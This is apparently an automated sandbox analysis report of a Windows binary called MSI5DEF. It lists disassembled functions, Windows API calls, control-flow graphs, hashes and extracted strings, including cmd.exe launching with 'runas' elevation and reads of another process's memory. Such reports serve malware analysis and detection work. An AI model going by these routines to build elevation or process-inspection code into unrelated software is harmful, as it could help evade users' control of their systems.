                                                                        • Instruction ID: 8ee33362575cb7027b1b96f634e7c543d3b903ec63a3bc888580c8569f427e36
                                                                        • Opcode Fuzzy Hash: 34a95a0338cccef838c2212a43f2fe154596adcc1975d1600576f252e8ba2915
                                                                        • Instruction Fuzzy Hash: 9B31E975D053199BDB20DF64D9497CDBBF8AF14300F1041EAE449AB290EB715B85CF45
                                                                        Function 00AF2161 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,?,00AE3270,?), ref: 00AF2176
                                                                        • FormatMessageA.KERNEL32(00001300,00000000,1816BA6E,00000000,00000000,00000000,00000000,?,?,?,00AE3270,?), ref: 00AF2198
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: FormatInfoLocaleMessage
                                                                        • String ID: !x-sys-default-locale
                                                                        • API String ID: 4235545615-2729719199
                                                                        • Opcode ID: ed6d5df81f872fc0e713640622d0122921145c0b408e6b9a26b440426f9f54d3
                                                                        • Instruction ID: 088b28f069da66a38b2544e18469822c2e3f846e21c8e1109aaa385ab5117e2f
                                                                        • Opcode Fuzzy Hash: ed6d5df81f872fc0e713640622d0122921145c0b408e6b9a26b440426f9f54d3
                                                                        • Instruction Fuzzy Hash: 6FE06DB6150118BFFB149FA0CC0BEBF7BADEB04791F004114BA01E2190E6B0AE00CBA0
                                                                        Function 00AE7660 Relevance: 42.4, APIs: 16, Strings: 8, Instructions: 384libraryloadersleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 395 ae7660-ae76cb 396 ae76cc-ae7728 call ae8530 call ae2100 * 2 call ae7db0 395->396 404 ae772e-ae773d 396->404 405 ae7a7b-ae7aac call ae1910 GetWindowThreadProcessId 396->405 406 ae773f-ae7747 call ae2750 404->406 407 ae774a-ae7760 call b10d39 404->407 412 ae7aae-ae7ade GetWindowLongW 405->412 413 ae7ae1-ae7ae8 405->413 406->407 407->405 416 ae7766-ae7796 call ae2100 407->416 419 ae7798-ae779b 416->419 420 ae77a0-ae77a4 416->420 419->420 421 ae77aa-ae77af 420->421 422 ae7855-ae78a2 420->422 423 ae77b1-ae77b7 421->423 424 ae78ad-ae78af 422->424 425 ae78a4-ae78aa GetForegroundWindow 422->425 428 ae77b9-ae77bc 423->428 429 ae77d7-ae77d9 423->429 426 ae78bd-ae78cc ShellExecuteExW 424->426 427 ae78b1-ae78bb call ae7af0 424->427 425->424 431 ae78ce-ae78d9 call ae7c30 426->431 432 ae78dc-ae78de 426->432 427->426 433 ae77be-ae77c6 428->433 434 ae77d3-ae77d5 428->434 435 ae77dc-ae77de 429->435 431->432 440 ae7912-ae7932 call ae7ef0 432->440 441 ae78e0-ae78e6 432->441 433->429 442 ae77c8-ae77d1 433->442 434->435 436 ae7816-ae7852 GetWindowsDirectoryW call ae1980 * 2 435->436 437 ae77e0-ae77e5 435->437 436->422 443 ae77e7-ae77ed 437->443 454 ae79cb-ae79d0 440->454 455 ae7938-ae795e GetModuleHandleW GetProcAddress AllowSetForegroundWindow 440->455 446 ae78ed-ae7907 ShellExecuteExW 441->446 447 ae78e8-ae78eb 441->447 442->423 442->434 449 ae77ef-ae77f2 443->449 450 ae780d-ae780f 443->450 446->440 452 ae7909-ae790d call ae7c30 446->452 447->440 447->446 456 ae7809-ae780b 449->456 457 ae77f4-ae77fc 449->457 458 ae7812-ae7814 450->458 452->440 463 ae79f2-ae7a12 call ae7d30 454->463 464 ae79d2-ae79da 454->464 455->454 469 ae7960-ae7967 455->469 456->458 457->450 461 ae77fe-ae7807 457->461 458->422 458->436 461->443 461->456 470 ae7a1c-ae7a2d 463->470 471 ae7a14-ae7a17 463->471 464->463 467 ae79dc-ae79ec WaitForSingleObject GetExitCodeProcess 464->467 467->463 469->454 472 ae7969-ae7982 GetModuleHandleW GetProcAddress 469->472 473 ae7a2f-ae7a32 470->473 474 ae7a37-ae7a4c 470->474 471->470 475 ae79c8 472->475 476 ae7984-ae798c 472->476 473->474 477 ae7a4e-ae7a51 474->477 478 ae7a56-ae7a7a call b07708 474->478 475->454 481 ae7990-ae7993 476->481 477->478 481->475 483 ae7995-ae79bf Sleep EnumWindows 481->483 483->481 484 ae79c1-ae79c2 BringWindowToTop 483->484 484->475
                                                                        APIs
                                                                        • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 00AE781F
                                                                        • GetForegroundWindow.USER32(?,?), ref: 00AE78A4
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00AE78C1
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00AE78FF
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00AE7942
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AE7949
                                                                        • AllowSetForegroundWindow.USER32(00000000), ref: 00AE7953
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00AE7973
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AE797A
                                                                        • Sleep.KERNEL32(00000064,?,?,?), ref: 00AE7997
                                                                        • EnumWindows.USER32(00AE7A90,?), ref: 00AE79B3
                                                                        • BringWindowToTop.USER32(?), ref: 00AE79C2
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00AE79DF
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00AE79EC
                                                                          • Part of subcall function 00AE7D30: CloseHandle.KERNEL32(?,1816BA6E,00000010,00000010,?,?), ref: 00AE7D72
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00AE7A9C
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AE7AB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Handle$AddressExecuteForegroundModuleProcProcessShellWindows$AllowBringCloseCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                        • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                        • API String ID: 1023610922-986041216
                                                                        • Opcode ID: 7d267960365f14325ddd89ec92a440e1be81b1ccd6a10e2f0e5ca63555df9a23
                                                                        • Instruction ID: 6279d254d588ba834df51cbc7ca53f392a5b6036b1940273ee68762549517e5e
                                                                        • Opcode Fuzzy Hash: 7d267960365f14325ddd89ec92a440e1be81b1ccd6a10e2f0e5ca63555df9a23
                                                                        • Instruction Fuzzy Hash: 48E19171A04249DFDB10DFA9C988AAEBBF5FF14310F248169E515EB2A1DB30DE45CB60
                                                                        Function 00AE8790 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 349filememoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00AE880D
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00AE8860
                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE886F
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00AE888B
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE896B
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE8977
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE89B3
                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE89D2
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE89EF
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE8A83
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00AE8ACE
                                                                        • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00AE8B1C
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE8B4B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                        • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                        • API String ID: 2199533872-3004881174
                                                                        • Opcode ID: ff6f316d327a387bd74b3669b432e2c2388805dcd4d7c4c9b9fafc06d910fbff
                                                                        • Instruction ID: b93a4f385d0950dcc2471f535819ed6d7d335e2e86d3bf093f422f023c994c1e
                                                                        • Opcode Fuzzy Hash: ff6f316d327a387bd74b3669b432e2c2388805dcd4d7c4c9b9fafc06d910fbff
                                                                        • Instruction Fuzzy Hash: A6C136719002859FEB20DF69CC45BBFBBF5EF54700F244169E908AB2D1EB788A05C7A1
                                                                        Function 00B07769 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00B44AF8,00000FA0,?,?,00B07747), ref: 00B07775
                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00B07747), ref: 00B07780
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00B07747), ref: 00B07791
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B077A3
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B077B1
                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00B07747), ref: 00B077D4
                                                                        • DeleteCriticalSection.KERNEL32(00B44AF8,00000007,?,?,00B07747), ref: 00B077F0
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00B07747), ref: 00B07800
                                                                        Strings
                                                                        • kernel32.dll, xrefs: 00B0778C
                                                                        • SleepConditionVariableCS, xrefs: 00B0779D
                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B0777B
                                                                        • WakeAllConditionVariable, xrefs: 00B077A9
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                        • API String ID: 2565136772-3242537097
                                                                        • Opcode ID: 2625e5f1651777f4493d57fad2dbc7c60a93c8e94806b3306b52e4aade89de19
                                                                        • Instruction ID: b8df5ff5357c7172862b00ece129e6087e82cfaaaa3259733b90c3f33e5081fe
                                                                        • Opcode Fuzzy Hash: 2625e5f1651777f4493d57fad2dbc7c60a93c8e94806b3306b52e4aade89de19
                                                                        • Instruction Fuzzy Hash: 1C01B135B80711ABD7312B75BC0DF267AD8EB46B82B0500A5F815E35B0DFB0DD1286A5
                                                                        Function 00AEF010 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 254memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000018,1816BA6E,?,00000000), ref: 00AEF076
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEF0B3
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEF11D
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AEF2B9
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEF376
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00AEF39E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name$false$true
                                                                        • API String ID: 975656625-1062449267
                                                                        • Opcode ID: f31e28aa0f3b918bb08a767952b270c866afe601bc79bd29c186fecfc0404851
                                                                        • Instruction ID: e36f9f34a12130d7ccb2a58f7d994e5791e82b219a67851e1fd66c7bd43e50e1
                                                                        • Opcode Fuzzy Hash: f31e28aa0f3b918bb08a767952b270c866afe601bc79bd29c186fecfc0404851
                                                                        • Instruction Fuzzy Hash: 6AB183B1D00388DEEB20DFA5C945BDEBBF4FF14304F1481A9E558AB282E7759A48CB51
                                                                        Function 00AE6A60 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,1816BA6E,?,00000000), ref: 00AE6AC2
                                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000,?,1816BA6E,?,00000000), ref: 00AE6AE3
                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,1816BA6E,?,00000000), ref: 00AE6B16
                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,1816BA6E,?,00000000), ref: 00AE6B27
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6B45
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6B61
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6B89
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6BA5
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6BC3
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6BDF
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle$Process$OpenTimes
                                                                        • String ID:
                                                                        • API String ID: 1711917922-0
                                                                        • Opcode ID: 1067b0d4f45e45bf5e8b461476b9204d7dd8ae29d93d3dc7fbc6484eb156a024
                                                                        • Instruction ID: 27c71ead79fe89eacf90e6cb90ec948efb5a327518bc2133c27fa4cb475414eb
                                                                        • Opcode Fuzzy Hash: 1067b0d4f45e45bf5e8b461476b9204d7dd8ae29d93d3dc7fbc6484eb156a024
                                                                        • Instruction Fuzzy Hash: 155157B1E01258EBDB10CF99C984BEEFBF5AB58724F244259E914B72D0C7B45D01CBA8
                                                                        Function 00B00834 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B0083B
                                                                          • Part of subcall function 00AF780A: __EH_prolog3.LIBCMT ref: 00AF7811
                                                                          • Part of subcall function 00AF780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AF781B
                                                                          • Part of subcall function 00AF780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF788C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1538362411-2891247106
                                                                        • Opcode ID: 5b6ee4370f3329786413148d3ec8ca286e1f74bd7f4d10e440a50d4f1142abc8
                                                                        • Instruction ID: ca0cbac42ad7b238ba96584bdb6ec11346dd70faf41d0941398747d82f142db0
                                                                        • Opcode Fuzzy Hash: 5b6ee4370f3329786413148d3ec8ca286e1f74bd7f4d10e440a50d4f1142abc8
                                                                        • Instruction Fuzzy Hash: 12C1917255010AAFDB18EF98C995FFE7FE8FB05304F144599FA46A7291D630DA00CB60
                                                                        Function 00B059E2 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B059E9
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5BD
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5E0
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC608
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC6A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1383202999-2891247106
                                                                        • Opcode ID: 0e76660da326ba8974f6b53de56783b1b794a4b321ba706ff424fd78966904f9
                                                                        • Instruction ID: 5df55335d9ec91d803441943ce911c38a0ac10c4a6f7e21d8f116cf73b0aa4ae
                                                                        • Opcode Fuzzy Hash: 0e76660da326ba8974f6b53de56783b1b794a4b321ba706ff424fd78966904f9
                                                                        • Instruction Fuzzy Hash: 44C14276500609AFDB38DF58C999DFB7FE8EB05300F14469AFA06A66D1D630DA10CF60
                                                                        Function 00B00C24 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B00C2B
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB52D
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB550
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB578
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1383202999-2891247106
                                                                        • Opcode ID: b6b7dc0ee5300fde8d0661d82d7d694322362a2f8cf481ff8f4b3aa6c2d32b1f
                                                                        • Instruction ID: 2adf0167732707ddaa7cffab143d0e9031718d00651069aaea29cb710b6c62cc
                                                                        • Opcode Fuzzy Hash: b6b7dc0ee5300fde8d0661d82d7d694322362a2f8cf481ff8f4b3aa6c2d32b1f
                                                                        • Instruction Fuzzy Hash: F2C1527651010EAFDB28EF98C995EFF7FE8EB19300F144599FA06A6291D730DA10DB60
                                                                        Function 00AE65B0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 258libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00AE6090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AE60F4
                                                                          • Part of subcall function 00AE6090: GetLastError.KERNEL32 ref: 00AE6190
                                                                        • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00AE6632
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 00AE668B
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 00AE6712
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00AE67F6
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00AE686E
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00AE68C9
                                                                        • FreeLibrary.KERNEL32(?,?,00000000), ref: 00AE691E
                                                                        Strings
                                                                        • NtQueryInformationProcess, xrefs: 00AE662C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead$ErrorFreeLast$AddressDirectoryLibraryLocalProcSystem
                                                                        • String ID: NtQueryInformationProcess
                                                                        • API String ID: 253270903-2781105232
                                                                        • Opcode ID: 2ed13a2ba8e72b01f111af6c596692c80e660effdb8c035df7905e17e05e9b11
                                                                        • Instruction ID: 2f16ba305067787c5bd60134d7a84184fb407c792ca5c4789488fd899fb033bc
                                                                        • Opcode Fuzzy Hash: 2ed13a2ba8e72b01f111af6c596692c80e660effdb8c035df7905e17e05e9b11
                                                                        • Instruction Fuzzy Hash: 2FB18170D10749DADB20CF65C9487AEBBF0FF58308F204A5DE449A7690DBB566C8CB91
                                                                        Function 00AFD491 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AFD498
                                                                        • _Maklocstr.LIBCPMT ref: 00AFD501
                                                                        • _Maklocstr.LIBCPMT ref: 00AFD513
                                                                        • _Maklocchr.LIBCPMT ref: 00AFD52B
                                                                        • _Maklocchr.LIBCPMT ref: 00AFD53B
                                                                        • _Getvals.LIBCPMT ref: 00AFD55D
                                                                          • Part of subcall function 00AF708B: _Maklocchr.LIBCPMT ref: 00AF70BA
                                                                          • Part of subcall function 00AF708B: _Maklocchr.LIBCPMT ref: 00AF70D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
